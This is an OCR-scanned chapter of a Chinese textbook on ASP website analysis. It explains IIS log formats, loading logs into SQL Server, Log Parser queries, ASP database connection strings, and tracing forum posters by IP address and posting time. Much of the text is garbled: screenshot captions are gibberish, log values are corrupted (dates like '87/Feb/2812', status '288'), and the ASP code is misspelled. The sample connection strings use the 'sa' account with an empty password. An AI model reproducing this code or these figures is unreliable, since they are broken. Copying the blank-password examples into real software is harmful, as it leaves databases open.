日 期 活动 发 生 的 日 期 

时 间 活动 发 生 的 时 间 

服务 和 实例 网 站 实例 显示 为 W3SVC# ;其 中 # 是 站 点 的 实例 

计算 机 名 服务 器 的 网 络 基本 输入 输出 系统 (NetBIOS) 名 称 

服务 器 的 IP 地 址 为 请 求 提供 服务 的 服务 器 的 IP 地 址 

所 用 时 间 操作 花费 的 时 间 长 短 ( 毫 秒 ) 

发 送 字 节 数 从 客户 端 向 服务 器 发 送 的 字 节 数 


Eee 第 2 章 ASP 网 站 构建 与 分 析 mm 
续 表 
字 段 描 述 
接收 字 节 数 客户 端 从 服务 器 接收 到 的 字 节 数 
服务 状态 码 HTTP 或 FTP 状态 码 
Windows 状态 码 用 Windows 使 用 的 术语 表示 的 操作 的 状态 
请 求 类 型 服务 器 收 到 的 请 求 类 型 (如 GET 和 POST) 
操作 目标 操作 目标 URL 
参数 传递 给 脚本 的 参数 
3) NCSA 公用 日 志文 件 格 式 
een sled 活动 日 志 格 式 选 择 “NCSA 公用 日 志文 件 格 
式 ” 项 , 单 击 “ 属 性 ”按钮 ,打开 “日 志 记 录 属 性 ”对 话 框 , 可 对 日 志文 件 目录 、 eat 
计划 进行 设置 ,生成 的 日 志文 件 如 图 2-64 所 示 。NCSA 公用 日 志文 件 格式 的 日 志文 件 也 
没有 字段 名 称 ,每 条 日 志 各 个 字段 对 应 的 含义 如 表 2-3 所 示 。 
EECZTETEEEEZ3 =|Djx| 


文件 到 ) 编辑 于) 格式 @) 查看 WV) 和 帮 助 0D 


192.168.6.1 - - [87/Feb/2812:12:33: 
192.168.6.1 - - [87/Feb/2812:1 :0 

-1 - - [87/Feb/2812:12:33:87 
6 


:1 
[87/Feb/2812: :12: 33: 
[87/Feb/2812:12:33: 
[87/Feb/2812:12:33: 
[87/Feb/2812:12:33: 


findex.asp HTTP/1.1" 288 35755 
/inc/Main.js HTTP/1.1" 288 7478 
/Skins/Default/dunenubg3.gif HTTP/1.1" 269 266 
"GET /Skins/Default/css/default/topbg.gif HTTP/1.1" 
"GET /favicon.ico HTTP/1.1" 484 08 

"GET /images/1ogo-gif HTTP/1.1" 288 3915 

"GET /Skins/Default/css/default/bottombg .gif HTTP/1 
"GET /Skins/Default/css/default/tabs_m_tile.gif HTT 
"GET /Skins/Default/css/default/bg1.gif HTTP/1.1" 2 
"GET /Skins/Default/navspacer -gif HTTP/1.1" 288 392. 
ET /skins/default/ao1.gif HTTP/1.1" 288 5649 
“GET /skins/default/ao.gif HTTP/1.1" 2868 5616 

”GET /skins/default/messages2.gif HTTP/1.1" 288 445 
"GET /Skins/Default/vip.gif HTTP/1.1" 288 659 

"GET /skins/default/messages1.gif HTTP/1.1" 288 326 
"BET /skins/default/gb(1).gif HTTP/1.1" 288 763 而 


15 +*9896] 


图 2-64 NCSA 公用 格式 日 志文 件 


表 2-3 NCSA 公用 日 志 各 字段 描述 


远程 主机 地 址 提出 请 求 的 客户 机 的 IP 地 址 

远程 登录 名 称 该 值 通常 为 连 字符 (-) 

用 户 名 对 于 通过 身份 验证 的 用 户 , 格 式 是 * 域 \ 用 户 名 ;匿名 用 户 ,为 连 字 符 (-) 
日 期 活动 发 生 的 日 期 


时 间 和 GMT 时 差 


发 生活 动 的 时 间 , 后 面 跟 的 是 格林 尼 治 标准 时 间 时 差 


使 用 的 请 求 类 型 .目标 URL ,传递 给 脚本 的 参数 (如 果 有 的 话 ) 以 及 客户 端 


人 使 用 的 HTTP 版 本 
服务 器 状态 码 HTTP 状态 码 
送 字 节 数 从 服务 器 向 客户 端 发 送 的 字 节 数 
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4) ODBC 日 志 记 录 格 式 

ODBC 日 志 记 录 格 式 设置 过 程 相对 前 面 三 种 日 志 记 录 格 式 来 说 比较 复杂 ,下 面 以 实 
例 来 说 明 ODBC 日 志 记 录 格 式 的 设置 步骤 及 相应 字段 含义 。 

【 实 训 2-8】 虚拟 机 Windows 2003 Server 作为 Web 服务 器 发 布 了 dvbbs 网 站 ,该 
网 站 IP 地 址 为 192. 168. 6. 128 ,域名 为 dvbbs. ccpc. edu, 虚 拟 机 Windows 2003 Server 同 
时 又 作为 数据 库 服务 器 , 现 将 该 网 站 的 活动 日 志 格式 更 改 为 "“ODBC 日 志 记录 ”, 将 活动 日 
志 记 录 到 数据 库 服务 器 LogDatabase 数据 库 的 inetlog 数据 表 中 。 

(1) 在 虚拟 机 Windows 2003 server 中 创建 数据 库 。 

打开 SQL Server Enterprise Manager 窗口 ,创建 新 数据 库 LogDatabase( 人 参见 2. 1.2 
节 ), 如 图 2-65 所 示 。 


Ta SQL Server Enterprise Hanager - [控制 台 根 目录 Hicrosoft S9L Ser--- 区 |@| 风 | 
篇 | 文件 EF) 操作 以) 查看 WD 工具 C) 窗口 人 ) 帮助 0D 
人 六 回 困 | 阶 日 配 久 国 米 人 洛 即 0@ 苇 乌 


回 控制 台 根 目录 由 Leesessese。 io 个 项 上 


日 德 icroxseft SQL Servers 


日 各 SL server 组 ms 加 
日 芭 aoeca) Qindons mm) 恒 6 
站 数据 库 


关系 图 存储 过 程 


党 目 旦 外 


规则 默认 值 了 骤 用 


由 回 nets Data Services 


图 2-65 LogDatabase 数据 库 


(2) 在 LogDatabase 数据 库 中 创建 日 ws 

选择 “工具 ”一 “SQL 查询 分 析 器 ”命令 C:\WINDOWS\system32\inetsrv\ 
logtemp. sql 文件 , 选 定数 据 库 为 L i 2-66 所 示 。 选 择 “ 查 询 ” 一 “执行 ” 命 
令 ,创建 日 志 信 息 表 inetlog。 


SQL 查询 分 析 器 - [查询 一 CCPC-XP_LoeDatabase. CCPC_XP\Adninistrator Cr ee \ine. =|Djxl 
时 文件 和 ) 编辑 字 ) 查询 @) 工具 CD) 窗口 如 帮助 如 =l9|x| 
| 冰 - 苞 加 加 | 多 蓝 启 回 鲍 | 己 | 国 -|v， [wa 习 | 亚 | 等 区 | 区 国 
对 象 浏览 器 x| | reste tble inetT 


og 
ee CCPC-XP (CCPC-XP\Air | Clientgost varchar (S56), usernane varchar (255), 

LogTine datetine, service varchar( 255), nachine varchar( 255), 
serverip varchar( 50), processingtine int, bytesrecvd int, 
bytessent int, servicestatus int, win32status int, 
operation varchar( 255), target varchar (255), paraneters varchar (255) 


2-66 创建 日 志 信息 表 inetlog 
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(3) 在 虚拟 机 Windows 2003 Server 中 创建 ODBC 数据 源 。 
QO@ 选择 “开始 ”一 “管理 工具 ”一 “数据 源 (ODBC)” 命 令 , 打 开 “ODBC 数据 源 管理 器 ” 
对 话 框 , 单 击 “ 系 统 DSN” 标 签 , 如 图 2-67 所 示 。 
| 
用 户 DSN 系统 DSI | 文件 DSH | 驱动 程序 | 跟踪 | 连接 池 | 关于 | 
系统 数据 源 人) 


添加 四 ). 
配置 (CY 


@ 和 


确定 |。 取消 Ea 敌 助 
图 2-67 “ODBC 数据 源 管理 器 ”窗口 


@ 单 击 “添加 ?按钮 ,打开 如 图 2-68 所 示 的 对 话 框 ,选择 SQL Server 项 , 单 击 “ 完 成 ” 
按钮 。 


EEEEEE x 


选择 悠 想 为 其 安装 数据 源 的 驱动 程序 (5)。 


Microsoft Excel-Treiber (*.xls) 
Microsoft FoxPro VFP Driver (#. dbf) 


Microsoft Text Driver (#. txt; *.csv) 
Microsoft Text-Treiber (#. txt; *. csv) 
Microsoft Visual FoxPro Driver 
Microsoft Visual FoxPro-Treiber 

» 


ESS 取消 


图 2-68 数据 源 创建 向 导 界 面 1 


@ 在 “创建 SQL Server 的 新 数据 源 ” 对 话 框 中 为 数据 源 命名 为 IISLog ,指定 SQL 
Server 服务 器 为 (local) 项 ,如 图 2-69 所 示 。 单 击 “ 下 一 步 ” 按 钮 。 

@ 选择 “使 用 用 户 输入 登录 ID 和 密码 的 SQL Server 验证 (S)”, 输 入 登录 数据 库 的 
ID 及 密码 ,可 使 用 数据 库 sa 用 户 及 对 应 密码 , 单 击 “ 下 一 步 ” 按 钮 。 

@ 更 改 默认 的 数据 库 为 第 一 步 所 创建 的 数据 库 , 即 LogDatabase, 如 图 2-71 所 示 , 单 
击 “ 下 一 步 ” 按 钮 。 
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EE 的 新 数 蜂 天 对 
此 向 导 格 帮 助 建立 一 个 能 用 于 连接 SQL Server 的 0DBC 数据 源 。 


图 2-69 ”数据 源 创建 向 导 界面 2 


EE 的 新 数 需 源 x 
SQL Server 应 该 如 何 验证 登录 ID 的 真 伪 ? 
个 使 用 网 络 登录 ID 的 Windows 卫 验证 名。 


和 用 用 户 辆 入 惟 录 全 和 要 码 的 SL Server 狼 证 (Gj. ] 


we 要 更 疏 用 于 与 SQL Server 通讯 的 网 络 库 ， 请 单 击 “客户 端 也 置 ” 
客户 端 配置 [).. 
厅 连接 SQL Server 以 获得 其 它 配置 选项 的 默认 设置 C)。 


登录 ICU): [s。 
ED 


mm | mm | 
图 2-70 数据 源 创建 向 导 界 面 3 


EE EE xl 
本 更改 默认 的 数据 库 为 四) 


= pe 厂 肝 加 和 库 人 各 09: 


av 
wp FE 计 S59L 语 铝 创建/ 邱 j 店 烤 过 程 7 并 删除 该 存储 过 程 


从 只 有 当 断 开 时 吕 ); 
个 当 断 开采 和 儒 结 时 间 样 适用 多 )。 
你 使 用 ANSI 引用 的 标识 符 四。 
伙 使 用 ANSI 的 空 值 、 填 充 及 警 洁 (A)。 
同居 主 S9L Seryer 个 可 用 ， 请 使 用 故障 转移 SEL Seryer [ED)s 


mm | | 


图 2-71 数据 源 创建 向 导 界 面 4 


@ 其 余 均 按 默 认 选 项 设置 , 单 击 “ 完 成 ”按钮 后 会 弹出 “创建 ODBC 数据 源 配 置信 息 
确认 ”对 话 框 ,在 该 对 话 框 内 单 击 “ 测 试 数据 源 ” 按 钮 进行 测试 ,直至 显示 “数据 源 测试 成 
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功 ” 界 面 后 表明 该 数据 源 能 够 与 步骤 @ 中 所 指定 的 数据 库 LogDatabase 进行 连接 , 即 完成 


了 ODBC 数据 源 的 创建 。 
| 


图 2-72 “测试 数据 源 ” 界 面 


SQL Server 0DBC 数 硕 源 测 试 x| 


图 2-73 数据 源 测试 成 功 界面 


(4) 在 虚拟 机 Windows 2003 server 中 将 网 站 活动 日 志 更 改 为 “ODBC 日 志 记 录 ”。 


在 图 2-61 中 的 “dvbbs 属性 ”对 话 框 EE 
中 ,活动 格式 选择 "ODBC 日 志 记录 ”项 , 单 “ 吧 忆 | 
击 “ 属 性 "按钮 ,打开 “ODBC 日 志 记 录 属 和 
性 ?对 话 框 , 如 图 2-74 所 示 。 在 该 对 话 框 
内 设置 正确 的 ODBC 数据 源 名 、 表 名 、 用 户 表 四 ) 
名 及 密码 ,最 后 单 击 * 确 定 "按钮 完成 操作 。 ob 
(5) 测试。 es 
通过 http://dvbbs. ccpc. edu 访问 网 i 
站 , 则 可 看 到 LogDatabase 数据 库 inetlog I | 


表 中 的 相应 访问 日 志 数 据 如 图 2-75 所 示 。 


“ODBC 日 志 记录 ”类 型 的 日 志 字段 解析 如 sl el es 
表 2-4 所 示 。 图 2-74 “ODBC 日 志 记录 属性 "对话 框 


作 表 “inetlog” 中 的 数据 ,位置 是 “Loghatabase™ 中 、 “Qocal)” 上 


192, 168. 6. 128 
192. 168. 6. 128 
192. 168. 6. 128 
192. 168.6.128 
192. 168. 6. 128 
192. 168. 6. 128 
192. 168. 6. 128 
192. 168.6. 128 
192. 168. 6. 126 
192. 168.6.126 
192. 168.6.126 
192. 168.6.126 
192. 168.6. 128 
192. 168.6. 128 
192.168.6.128 


2012-2-8 12:33: 


0 
94 
0 
0 
0 
0 
0 
15 
0 
16 
0 
0 
32 


3 
3 
3 
3 


图 2-75 


inetlog 表 数 据 


| 
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表 2-4 ODBC 日 志 各 字段 描述 


ClientHost 访问 服务 器 的 客户 端 IP 地 址 

username 访问 服务 器 的 已 验证 用 户 的 名 称 , 连 字符 (-) 表 示 匿 名 用 户 
LogTime 活动 发 生 的 日 期 时 间 

service 服务 实例 ,格式 为 W3SVC# ;其 中 # 是 站 点 的 实例 
machine 服务 器 的 网 络 基本 输入 输出 系统 (NetBIOS) 名 称 

serverip 为 请 求 提供 服务 的 服务 器 的 IP 地 址 

processingtime 操作 花费 的 时 间 长 短 ( 毫 秒 ) 

bytesrecvd 客户 端 从 服务 器 接收 到 的 字 节 数 

bytessent 从 客户 端 向 服务 器 发 送 的 字 节 数 

servicestatus HTTP 服务 状态 码 


win32status 


用 Windows 使 用 的 术语 表示 的 操作 的 状态 


operation 服务 器 收 到 的 请 求 类 型 (例如 GET 和 POST) 
target 操作 目标 URL 
parameters 传递 给 脚本 的 参数 


4. 日 志 分 析 方 法 


由 于 HTTP1. 1 版 本 的 一 


次 连接 .多 次 传输 功能 ,客户 通过 浏览 器 每 浏览 一 个 网 页 ， 
都 会 同时 向 网 站 发 出 多 个 HTTP 请 求 ,网 站 会 在 后 台 生 成 多 条 日 志 记录 ,而 且 不 管 访 问 
是 否 成 功 , 都 会 在 服务 器 端 产 生 相应 的 日 志 。 所 以 ,网 站 在 运行 过 程 中 ,所 产生 的 日 志 


件 是 非常 大 的 ,如 何 处 理 分 析 大 量 日 志 信 息 在 网 站 分 析 过 程 中 是 非常 重要 的 。 
1) 将 日 志文 件 导 入 数据 库 中 分 析 


将 日 志文 件 导 入 到 数据 库 中 ,那么 就 可 以 借助 SQL 语句 快速 地 对 大 量 数据 进行 分 析 
处 理 ,通常 可 以 选择 自己 熟悉 的 数据 库 系 统 。 以 默认 的 日 志文 件 格式 W3C 扩展 日 志 为 


例 , 将 其 导入 到 SQL Server 数据 库 中 的 步骤 如 下 : 


(1) 日 志文 件 预 处 理 。 


W3C 扩展 日 志文 件 开始 部 分 会 有 一 些 软件 名 称 ,版 本 日志 生成 日 期 .字段 名 称 注 释 
等 信息 。 在 导入 文件 前 需要 将 这 些 注释 信息 去 掉 , 只 留 字段 名 称 信息 即 可 , 预 处 理 后 的 日 


志文 件 如 图 2-76 所 示 。 


(2) 在 SQL Server 中 创建 存放 日 志文 件 的 数据 库 Log, 如 图 2-77 所 示 。 


(3) 导 人 日 志文 件 。 


选择 Log 所 有 任务 ”一 导 和 人 数据 ”命令 ,将 日 志文 件 导 和 数据库 中 ,详细 步骤 参见 


2.1.2 节 ,注意 以 下 选项 设置 。 
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甩 ez120209- log 一 记事 本 
文件 中 编辑 到 ) 格式 中 ) 查看 W) 帮助 


date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User- 大 
2012-02-09 03:23: 192. 168. 6. 128 GET /inc/noline.htc - 80 - 192. 168. 6. 128 Mozills 
2012-02-09 03:23: 192. 168. 6. 128 GET /index- asp - 80 — 192. 168. 6. 128 Mozilla/4.0+ 
2012-02-09 03:23: 192. 168. 6. 128 GET /inc/Main. js - 80 - 192. 168. 6. 128 Mozilla/4. 
03:23: 192. 168. 6. 128 GET /images/logo. gif - 80 - 192. 168. 6. 128 Mozill 
03:23: 192. 168. 6. 128 GET /show ad_sc- asp fn=search. gif 80 - 192.168.€ 


03:23: 192. 168. 6. 128 GET /Skins/Default/css/default/topbg. gif - 80 一 
03:23: 192. 168. 6. 128 GET /Skins/Default/css/default/bottombg. gif - 8( 
03:23: 192. 168. 6. 128 GET /Skins/Default/css/default/tabs m tile. gif - 
03:23: 192. 168. 6. 128 GET /Skins/Default/dvmenubg3. gif - 80 - 192. 168. 
03:24: 192. 168. 6. 128 GET /Skins/Default/navspacer. gif - 80 - 192.168. 加 


> 


图 2-76 预 处 理 后 的 日 志文 件 内 容 


in SQL Server Enterprise anager - [控制 台 根 目录 \icrosoft 59L 5... 攻占 | 加 
入 | 文件 @) 操作 册 ”查看 WW) 工具 CD) 窗口 中 帮助 0 
国 | XX 办 站 区 国 困 米 父 凤 目 要 乌 


Enon Ed 


日 基 目 cerosoft SQL Servers 


| rr 
日 种 SQL server 组 Ce 习 
日 即 aocua) Windors mm “如 图 Eh Ea 
日 加 数据 库 关系 图 表 视图 存储 过 程 用 户 
旬 轴 


-Ey FG 目 日 入 &. 
本 角色 规则 默认 值 展 晤 间 用 名 


| 团 


图 2-77 Log 数据 库 


中 在 “选择 数据 源 ” 页 面 中 ,数据 源 设置 为 "文本 文件 ”, 再 选择 要 导入 的 日 志文 件 , 如 
图 2-78 所 示 。 


千 DTS 导入 /导出 向 导 


选择 数据 还 
您 要 从 何 处 复制 数据 ? 可 从 下 列 源 之 一 复制 数据 。 


数据 源 [D) [卓文 本文 件 
文本 文件 可 以 是 天 分 陋 符 的 ， 也 可 以 是 国定 字段 的 。 要 进行 连接 
必须 寺 择 一 个 文件 。 


文件 名 [E} D: Vamp\ex120209 log 出 | 


mw | | 
图 2-78 “选择 数据 源 ?页 面 


@ 在 “选择 文件 格式 ”页 面 中 ,将 “第 一 行 含有 列 名 称 ” 复 选 框 选中 ,其 余 按 默认 设置 ， 
如 图 2-79 所 示 。 
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分 DTS 导入 /导出 向 导 


选择 文件 格式 
才 只 请 确认 源 文件 格式 。 在 继续 之 前 确认 是 否 正确 地 检测 到 了 EE] 


人 带 分 隔 符 。 各 列 之 间 可 用 任何 宇 符 分 隔 吕 )。 
三 固定 字段 。 信 息 以 等 宽 按 列 对 齐 区 。 


文件 类 型 [站 ps Ws: 厂 司 
行 分 隔 罕 B} [cpp Hp 第 一 行 全 有 齐名 称 i 
文本 限定 符 (Q} 区 引号 人 -| 

文件 预览: Deenae0e beg - 


date time s-ip cs-method cs-uri-stem cs-uri-query 太 
2012-02-09 03: 23: 59 192.168. 6.128 GET /inc/noline 
2012-02-09 03:23:59 192.168. 6.128 GET /index.asp 六 


< 9 
my | 。 和 


图 2-79 “选择 文件 格式 "页面 


@ 在 “指定 列 分 隔 符 ”页 面 中 ,在 “其 他 ”选项 后 输入 空格 “预览” 列表 框 内 即 出 现 日 
志 数 据 ,如 图 2-80 所 示 。 


千 DIS 导入 /导出 向 导 
定 列 分 隔 符 
于 管 学 短 指 定 流 文人 的 光 分 隔 符 类 型。 您 可 以 选择 逗号 、 制 表 符 、 分 Ee] 
其 它 字符 。 


个 逗 叶 M) 三 制 表 符 四 个 分 号 9 F CEO} 


192.168.6.128 
192.168.6.128 
192168.6.128 
192168.6.128 
192168.6.128 
192.168.6.128 
1921686.128 
192168.6.128 


《上 一 步 @) 取消 


图 2-80 “指定 列 分 隔 符 "页面 


@ 在 “选择 目的 ”页 面 中 ,确认 数据 库 为 Log 项 ,如 图 2-81 所 示 。 


@ 完成 导入 之 后 ,自动 在 Log 数据 库 内 创建 与 日 志文 件 名 同名 的 数据 表 ex120209， 
表 内 容 如 图 2-82 所 示 。 


(4) 使 用 SQL 语句 进行 查询 。 


选择 “SQL 命令 图 标 ,在 “SQL 窗 格 ? 中 输入 SQL 语句 对 日 志 进 行 过 滤 分 析 , 如 图 2-83 
所 示 。 


2) 使 用 专业 工具 分 析 
Log Parser 是 微软 公司 出 品 的 日 志 分 析 工 具 , 它 功能 强大 ,使 用 简单 ,可 以 分 析 基 于 
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分 DIS 导入 /导出 向 导 


选择 目的 
您 要 格 数 据 复制 到 何 处 ? 可 将 数据 复制 到 下 列 目的 之 一 。 


ft DLE DB 提供 程序 


目 若 要 连接 到 Microsoft SQL Server， 必须 指定 服务 器 、 用 户 名 和 密码 。 


服务 器 (8} Je -| 
他 使 用 Windows 身 份 验证 [WW] 
个 使 用 SQL Server 身 份 验证 旧 ) 

| 


B | 
sD to 本 ma | wa | 
《上 - 频 @ [下 -5 四 说 Mw | Ww | 
图 2-81 “选择 目的 "页 面 


ni SQL Server Enterprise Wanager 一 
窗 文件 @) 窗口 帮助 0D 
区 | 至 夏 束 大 | 半 和 区 鸭 刘 到 有 


date Ttine [s-ip [es-uwi-sten [cs-uri-guery 
2012-02-09 03:23:59 168.6. fincfnoline. hte 一 
2012-02-09 03:23:59 168.6. findex. asp = 
2012-02-09 03:23:59 168.6. yinemain js - 
2012-02-09 03:23:59 168.6 Vimages/logo Bi 一 
2012-02-09 03:23:59 .168.6. /show_ad_sc. asp fn=search. gif 
2012-02-09 03:23:59 .168.6. /Skins/Default/ — 
2012-02-09 03:23:59 168.6, JSkins/Default/ ~ 
2012-02-09 03:23:59 168.6 /Skins/Default/ ~ 
2012-02-09 03:23:59 168.6 /Skins/Default/ — 
2012-02-09 03:24:45 168.6. JSkins/Default/:— 
到 ?pe mt pa R /Srins/nefen147 一 


EEEIEEEEEEEE 


图 2-82 ex120209 数据 表 


nSQL Server Enterprise 了 anager - [ 表 “ex120209” 中 的 数据 ,位 置 是 “Log... 攻关 | 加 | 
帮助 00 


HERE ([date] =“2012-02-09' ) 


date [tine i [es-uri-sten [cs-uri-guery 
2012-02-09 03:23:59 192. . fine/noline. hte — 
2012-02-09 03:23:59 findex. asp - 
2012-02-09 03:23:59 fine/Main js 一 
2012-02-09 03:23:59 /inages/logo. gi ~ 
2012-02-09 03:23:59 /show_ad_sc. asp fn=search gif 
2012-02-09 03:23:59 /Skins/Default/ - 


onto-nn-nn mp:op:en Ce 


图 2-83 使 用 SQL 语句 对 日 志 进 行 过 滤 


文本 的 日 志文 件 .XML 文件 .CSV( 喜 号 分 隔 符 ) 文 件 , 以 及 操作 系统 的 事件 日 志 、 注 册 
表 文件 系统 .Active Directory。 它 可 以 像 使 用 SQL 语句 一 样 查询 分 析 这 些 数据 ,甚至 可 
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以 把 分 析 结 果 以 各 种 图 表 的 形式 展现 出 来 。 使 用 该 工具 分 析 的 优点 是 日 志文 件 保留 源 格 
式 ,无 须 做 任何 改动 。 

例如 ,将 要 分 析 的 日 志文 件 复制 到 D 盘 根 目录 下 ,名 称 为 ex120209. log。 

(1) 安装 Log Parser。 

双击 安装 文件 LogParser. msi, 所 有 安装 选项 均 可 按 默 认 设置 。 安 装 完成 后 ,在 “ 开 
台 ”- 所 有 程序 "中 即 出 现 Log Parser 2. 2 子 菜单 ,选择 Log Parser 2. 2 命令 ,弹出 程序 
命令 窗口 如 图 2-84 所 示 。 


EEC -oo 
回 


and commands 
Help on 《input_format 
o:Koutput_format》 elp tput_fornat> 


-c : Conversion help 


C:\Programn Piles\Log Parser 2.2> 


图 2-84 ”LogParser 命令 窗口 


(2) 输入 LogParser 查询 命令 
可 以 在 LogParser 窗口 中 输入 “LogParser -h” 命 令 显 示 帮 助 信息 ,提示 LogParser 的 
用 法 。 对 日 志文 件 进行 分 析 可 以 输入 相应 的 查询 命令 进行 过 滤 分 析 , 如 图 2-85 所 示 。 


和 3 :23:59 192.168.6.128 /index.as 


2 seconds 


>: \Progran Files\Log Pars 


图 2-85 LogParser 分 析 结 果 


252 前 后 台 连 接 模 式 


由 于 用 户 向 网 站 输入 的 数据 最 终 是 存储 在 后 台 某 个 数据 库 表 中 ,因此 在 通过 前 台 网 
站 定位 数据 库 表 时 ,需要 掌握 ASP 网 站 常见 的 数据 库 连 接 代码 。 以 连接 SQL Server 数 
据 库 为 例 , 介 绍 常用 的 三 种 连接 方法 。 

1. 通过 QLE DB 与 数据 库 建立 连接 

OLE DB(Object Linking & Embedding Database) 是 直接 由 底层 的 数据 访问 接口 实 
现 的 ,通过 OLE DB 连接 数据 库 是 速度 最 快 的 一 种 方式 ,但 使 用 起 来 也 较为 复杂 。 用 
OLE DB 可 以 访问 各 种 数据 源 , 包 括 传统 的 关系 型 数据 库 , 以 及 电子 邮件 系统 、Excel\ 自 
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定义 的 商业 对 象 等 。 通 过 OLE DB 连接 SQL Server 数据 库 的 代码 如 下 : 


<% 

Set Conn= Server. CreateQbjec (ADODB. Connection ) 

strConn= “Provider= sqloledb;Data Source= server: Initial Catelog= DatabaseName;User 1d= UserName:;Password= 
pass;” 

Conn. Open (strComn) 

%> 


关键 参数 说 明 如 表 2-5 所 示 。 
表 2-5 通过 OLE DB 连接 数据 库 参 数 解析 


参 数 描 ” 述 举 例 
Provider 表示 提供 者 sqloledb 
Data Source 访问 数据 库 服务 器 的 IP 地 址 或 机 器 名 local 
Initial Catelog 访问 数据 库 的 名 称 shop 
User Id 使 用 的 用 户 名 称 sa 
Password 使 用 的 用 户口 令 人 


2. 利 用 ADO 组 件 连接 数据 库 

ADO(CAcetiveX Data Object) 是 一 组 优化 的 访问 数据 库 专 用 对 象 集 , 与 数据 访问 层 
OLE DB Provider 协同 工作 以 提供 通用 数据 访问 。ADO 是 对 OLE DB 的 面向 应 用 层 的 
封装 接口 ,其 主要 优点 是 可 移植 性 好 并 且 速 度 快 。 利 用 ADO 连接 SQL Server 数据 库 的 
代码 如 下 : 

<% 

Set ConnF Server. Create0b ject (“ADODB. Connection’) 

strConnF “Driver= {SQL Server] ;Server= ServerName:Uid UserName;Pwd= Password;Database= DatabaseName” 

Conn. Open (strConm) 

%> 

关键 参数 说 明 如 表 2-6 所 示 。 


表 2-6 利用 ADO 组 件 连接 数据 库 参数 解析 


参数 描 述 举例 
Driver SQL Server 数据 库 的 驱动 程序 SQL Server 
Server 访问 数据 库 服 务 器 的 IP 地 址 或 机 器 名 local 
Database 访问 数据 库 的 名 称 shop 
Uid 使 用 的 用 户 名 称 sa 
Pwd 使 用 的 用 户口 令 空 
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3. 通过 ODBC 连接 数据 库 

在 ADO 连接 数据 库 之 前 进行 数据 库 编程 最 常 采 用 的 就 是 ODBC, 它 属于 桥 连 技术 ， 
执行 速度 比较 快 ,使 用 也 简单 ,只 要 在 安装 Web 服务 器 的 计算 机 上 注册 一 个 数据 源 就 能 
够 方便 地 进行 数据 库 编程 ,而 且 安 全 性 高 ,不 易 受 到 攻击 。 通 过 ODBC 连接 SQL Server 
数据 库 具 体 步骤 如 下 : 

(1) 创建 ODBC DSN。 

数据 源 名 称 (Data Source Name.DSN) 存 储 有 关 如 何 连接 到 指定 提供 者 的 信息 。 一 
个 DSN 指定 了 数据 库 的 物理 位 置 ,用 户 访问 数据 库 的 驱动 程序 的 类 型 和 访问 数据 库 的 驱 
动 程序 所 需要 的 任何 其 他 参数 。 在 通过 ODBC 连接 数据 库 前 ,需要 先 在 安装 有 Web 服 
务 器 的 机 器 上 注册 一 个 数据 源 ,具体 步骤 见 2. 3. 1 节 。 

(2) 编写 如 下 脚本 代码 和 数据 库 源 建立 连接 。 


<% 

Set conrF Server. CreateQbjec (ADODB. Connection’) 
conn. connect ionstr ing= “DSN= Game;UID= sa:PWD= ;” 
conn. open 

网 > 


此 


<% 

Set conn= Server. CreateObjec (ADODB. Connection) 

conn. open 

%> 
其 中 ,Game 为 系统 DSN 的 名 称 。 

在 脚本 代码 被 执行 过 程 中 .ODBC 数据 源 管理 器 会 将 ASP 页 面 中 的 (DSN) 翻 译 为 指 
定 类 型 的 某 个 数据 库 , 这 样 当 数据 库 参 数 发 生 改 变 时 ,ASP 网 页 代码 不 用 更 改 , 只 需 在 
ODBC 数据 源 管理 器 中 重新 设置 DSN 即 可 。 


253 敏感 信息 追查 


ASP 网 站 在 运行 过 程 中 ,用 户 的 任意 页 面 访问 .数据 提交 等 操作 都 会 在 服务 器 端 产 
生 相 应 痕迹 ,本 节 讨 论 论坛 网 站 出 现 虚假 ,敏感 信息 后 ,该 如 何 进行 追查 并 分 析 可 疑 的 发 
帖 人 。 


1. 明确 追查 目标 

在 分 析 之 前 ,首先 需要 明确 追查 的 目标 是 什么 ”就 是 想 知道 哪个 人 发 布 了 特定 的 敏 
感 或 虚假 信息 。 网 站 在 运行 过 程 中 产生 的 痕迹 特征 只 能 记录 到 计算 机 的 身份 识别 信息 ， 
也 就 是 计算 机 的 IP 地 址 信息 。 在 很 多 情况 下 ,局 域 网 内 的 计算 机 是 通过 代理 使 用 同一 个 
IP 地 址 上 网 ,通过 计算 机 的 IP 地 址 信息 并 不 能 唯一 地 定位 到 发 帖 人 ,还 需要 另外 一 个 识 
别 信息 一 一 发 帖 时 间 。 发 帖 计算 机 IP 地 址 信息 加 上 发 帖 时 间 就 可 以 定位 到 可 疑 的 发 帖 
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人 ,因为 同一 时 刻 只 能 有 一 台 计 算 机 使 用 发 帖 IP 地 址 信息 。 例 如 , 某 人 在 网 吧 上 网 发 帖 ， 
可 以 通过 网 站 分 析 找 到 发 帖 计算 机 IP 地 址 和 发 帖 时 间 ,再 结合 网 吧 的 上 网 日 志 , 里 面包 
含 上 网 人 的 身份 信息 ,就 可 以 定位 到 发 帖 人 。 同 样 ,一 些 局 域 网 机 房 也 是 如 此 ,代理 服务 
器 日 志 信息 会 详细 记录 着 IP 地 址 转换 信息 。 

所 以 在 网 站 分 析 过 程 中 ,追查 目标 是 发 帖 计算 机 的 IP 地 址 信息 和 发 帖 时 间 ,而 发 帖 
时 间 通 常 在 网 站 论坛 相应 版 面 上 可 找到 ,需要 着 重 追 查 发 帖 计算 机 的 IP 地 址 信息 。 


2. 分 析 思 路 

1) 数据 在 网 站 处 理 过 程 中 会 产生 哪些 痕迹 

通过 网 站 工作 原理 可 知 , 用 户 在 客户 端 浏 览 ASP 网 页 发 帖 时 ,提交 数据 后 ,数据 封装 
在 HTTP 协议 请 求 包 首先 到 达 IIS 服务 器 进行 处 理 ,IIS 服务 器 会 对 所 处 理 的 请 求 信息 
写 和 IIS 上 日志; 然后 ,由 于 发 帖 页 面 涉及 ASP 代码 ,所 以 该 请 求 被 转发 到 ASP 应 用 服务 器 
中 ,由 于 ASP 应 用 服务 器 是 IIS 的 一 个 嵌入 模块 , 它 本 身 没 有 日 志 记 录 功 能 ;由 于 涉及 数 
据 库 操作 ,数据 被 转发 到 数据 库 SQL Server 处 理 , 数 据 最 终 被 存放 到 数据 库 表 中 ;最 后 ， 
用 户 在 客户 端 所 访问 的 论坛 界面 会 自动 刷新 ,看 到 新 发 布 的 数据 。 

通过 以 上 分 析 ,可 知 用 户 在 客户 端 向 网 站 提交 数据 .数据 被 ASP 网 站 接收 处 理 后 ,会 
产生 以 下 痕迹 ， 

(1) IIS 日 志 。 

(2) 数据 库 日 志 。 

(3) 数据 库 数 据 

(4) 客户 端 界面 。 

